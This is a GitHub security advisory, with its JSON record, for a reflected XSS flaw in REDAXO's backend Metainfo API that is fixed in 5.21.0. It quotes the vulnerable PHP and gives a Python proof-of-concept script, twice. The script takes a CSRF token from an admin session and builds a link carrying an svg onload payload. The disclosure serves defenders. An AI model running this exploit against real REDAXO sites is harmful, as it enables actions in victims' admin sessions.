GHSA-M662-8JRJ-CW6V
Vulnerability from github – Published: 2026-04-10 19:40 – Updated: 2026-04-10 19:40
VLAI
Summary
REDAXO has reflected XSS in backend Metainfo API via type parameter (CSRF token required)
Details
Summary
A reflected XSS vulnerability has been identified in the REDAXO backend. The type parameter is concatenated into an API error message and rendered without HTML escaping.
Details
Root cause
User input type is injected into an exception message, then rendered by rex_view::error() which delegates to rex_view::message() without HTML escaping.
Vulnerable code (redaxo/src/addons/metainfo/lib/handler/api_default_fields.php) :
$type = rex_get('type', 'string');
throw new rex_api_exception(sprintf('metainfo type "%s" does not have default field.', $type));
Sink (redaxo/src/core/lib/view.php) :
return '<div class="' . $cssClassMessage . '">' . $message . '</div>';
Data flow source -> sink
- Source : type (GET)
- Propagation : concatenated into the exception message
- Sink : rendered via rex_view::error() -> rex_view::message() without escaping
Authentication required : yes (backend session)
PoC - exploit
#!/usr/bin/env python3
import re
import urllib.parse
import requests
TARGET_URL = "http://poc.local/"
BACKEND_PATH = "redaxo/index.php"
SESSION_ID = "xxxxxxxxxxxxxxxxxxxxx"
VERIFY_SSL = False
TIMEOUT = 15
PAYLOAD = '\"><svg/onload=alert("pwned")>'
def build_backend_url() -> str:
base = TARGET_URL.rstrip("/")
return f"{base}/{BACKEND_PATH.lstrip('/')}"
def extract_api_csrf(html_text: str) -> str:
m = re.search(r'rex-api-call=metainfo_default_fields_create[^"\']+', html_text)
if not m:
raise RuntimeError("Could not find the metainfo_default_fields_create API link in the page HTML.")
fragment = m.group(0).replace("&", "&")
token_match = re.search(r"_csrf_token=([^&]+)", fragment)
if not token_match:
raise RuntimeError("CSRF token for metainfo_default_fields_create was not found in the extracted link.")
return token_match.group(1)
def set_session_cookie(session: requests.Session) -> None:
parsed = urllib.parse.urlparse(TARGET_URL)
if parsed.hostname:
session.cookies.set("PHPSESSID", SESSION_ID, domain=parsed.hostname, path="/")
def main() -> None:
backend_url = build_backend_url()
s = requests.Session()
set_session_cookie(s)
# Admin backend session required
r0 = s.get(backend_url, timeout=TIMEOUT, verify=VERIFY_SSL)
if "rex-page-login" in r0.text or "rex_user_login" in r0.text:
print("[!] Invalid/expired PHPSESSID. Update SESSION_ID with a valid backend session.")
return
r = s.get(backend_url, params={"page": "metainfo/articles"}, timeout=TIMEOUT, verify=VERIFY_SSL)
if r.status_code != 200:
print(f"[!] Failed to access metainfo page (HTTP {r.status_code}).")
return
api_token = extract_api_csrf(r.text)
params = {
"page": "metainfo/articles",
"rex-api-call": "metainfo_default_fields_create",
"type": PAYLOAD,
"_csrf_token": api_token,
}
exploit_url = f"{backend_url}?{urllib.parse.urlencode(params)}"
print(exploit_url)
if __name__ == "__main__":
main()
The script uses only the provided PHPSESSID, retrieves the CSRF token from the metainfo page, and prints a ready-to-use exploit link.
Impact
- Confidentiality : Low : no direct session theft (HttpOnly cookies), but possibility to access/exfiltrate data available via the DOM or via same-origin requests if the XSS executes in a victim’s session.
- Integrity : Low : possibility to chain backend actions on behalf of the user (same-origin requests) only if execution takes place in a victim session; otherwise the impact is limited to the user who triggers the call.
- Availability : Low : the XSS could disrupt the administration interface or trigger unwanted actions, but the token requirement strongly limits realistic scenarios.
Video
https://github.com/user-attachments/assets/251f548c-3f68-483b-a012-b8fc28493a83
Severity
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "redaxo/source"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.21.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-10T19:40:23Z",
"nvd_published_at": null,
"severity": "LOW"
},
"details": "### Summary\n\nA **reflected XSS** vulnerability has been identified in the REDAXO backend. The `type` parameter is concatenated into an API error message and rendered without HTML escaping.\n\n---\n\n### Details\n\n**Root cause** \nUser input `type` is injected into an exception message, then rendered by `rex_view::error()` which delegates to `rex_view::message()` without HTML escaping.\n\n**Vulnerable code (`redaxo/src/addons/metainfo/lib/handler/api_default_fields.php`) :**\n```php\n$type = rex_get(\u0027type\u0027, \u0027string\u0027);\nthrow new rex_api_exception(sprintf(\u0027metainfo type \"%s\" does not have default field.\u0027, $type));\n```\n\n**Sink (`redaxo/src/core/lib/view.php`) :**\n```php\nreturn \u0027\u003cdiv class=\"\u0027 . $cssClassMessage . \u0027\"\u003e\u0027 . $message . \u0027\u003c/div\u003e\u0027;\n```\n\n**Data flow source -\u003e sink**\n- Source : `type` (GET)\n- Propagation : concatenated into the exception message\n- Sink : rendered via `rex_view::error()` -\u003e `rex_view::message()` without escaping\n\n**Authentication required :** yes (backend session)\n\n---\n\n### PoC - exploit\n\n```python\n#!/usr/bin/env python3\nimport re\nimport urllib.parse\nimport requests\n\nTARGET_URL = \"http://poc.local/\"\nBACKEND_PATH = \"redaxo/index.php\"\nSESSION_ID = \"xxxxxxxxxxxxxxxxxxxxx\"\nVERIFY_SSL = False\nTIMEOUT = 15\n\nPAYLOAD = \u0027\\\"\u003e\u003csvg/onload=alert(\"pwned\")\u003e\u0027\n\n\ndef build_backend_url() -\u003e str:\n base = TARGET_URL.rstrip(\"/\")\n return f\"{base}/{BACKEND_PATH.lstrip(\u0027/\u0027)}\"\n\n\ndef extract_api_csrf(html_text: str) -\u003e str:\n m = re.search(r\u0027rex-api-call=metainfo_default_fields_create[^\"\\\u0027]+\u0027, html_text)\n if not m:\n raise RuntimeError(\"Could not find the metainfo_default_fields_create API link in the page HTML.\")\n fragment = m.group(0).replace(\"\u0026amp;\", \"\u0026\")\n token_match = re.search(r\"_csrf_token=([^\u0026]+)\", fragment)\n if not token_match:\n raise RuntimeError(\"CSRF token for metainfo_default_fields_create was not found in the extracted link.\")\n return token_match.group(1)\n\ndef set_session_cookie(session: requests.Session) -\u003e None:\n parsed = urllib.parse.urlparse(TARGET_URL)\n if parsed.hostname:\n session.cookies.set(\"PHPSESSID\", SESSION_ID, domain=parsed.hostname, path=\"/\")\n\n\ndef main() -\u003e None:\n backend_url = build_backend_url()\n\n s = requests.Session()\n set_session_cookie(s)\n\n # Admin backend session required\n r0 = s.get(backend_url, timeout=TIMEOUT, verify=VERIFY_SSL)\n if \"rex-page-login\" in r0.text or \"rex_user_login\" in r0.text:\n print(\"[!] Invalid/expired PHPSESSID. Update SESSION_ID with a valid backend session.\")\n return\n\n r = s.get(backend_url, params={\"page\": \"metainfo/articles\"}, timeout=TIMEOUT, verify=VERIFY_SSL)\n if r.status_code != 200:\n print(f\"[!] Failed to access metainfo page (HTTP {r.status_code}).\")\n return\n\n api_token = extract_api_csrf(r.text)\n\n params = {\n \"page\": \"metainfo/articles\",\n \"rex-api-call\": \"metainfo_default_fields_create\",\n \"type\": PAYLOAD,\n \"_csrf_token\": api_token,\n }\n\n exploit_url = f\"{backend_url}?{urllib.parse.urlencode(params)}\"\n print(exploit_url)\n\n\nif __name__ == \"__main__\":\n main()\n\n```\n\nThe script uses only the provided PHPSESSID, retrieves the CSRF token from the metainfo page, and prints a ready-to-use exploit link.\n\n---\n\n### Impact\n\n- **Confidentiality :** Low : no direct session theft (HttpOnly cookies), but possibility to access/exfiltrate data available via the DOM or via same-origin requests if the XSS executes in a victim\u2019s session.\n- **Integrity :** Low : possibility to chain backend actions on behalf of the user (same-origin requests) only if execution takes place in a victim session; otherwise the impact is limited to the user who triggers the call.\n- **Availability :** Low : the XSS could disrupt the administration interface or trigger unwanted actions, but the token requirement strongly limits realistic scenarios.\n\n### Video \n\nhttps://github.com/user-attachments/assets/251f548c-3f68-483b-a012-b8fc28493a83",
"id": "GHSA-m662-8jrj-cw6v",
"modified": "2026-04-10T19:40:23Z",
"published": "2026-04-10T19:40:23Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/redaxo/core/security/advisories/GHSA-m662-8jrj-cw6v"
},
{
"type": "PACKAGE",
"url": "https://github.com/redaxo/core"
},
{
"type": "WEB",
"url": "https://github.com/redaxo/core/releases/tag/5.21.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "REDAXO has reflected XSS in backend Metainfo API via type parameter (CSRF token required)"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…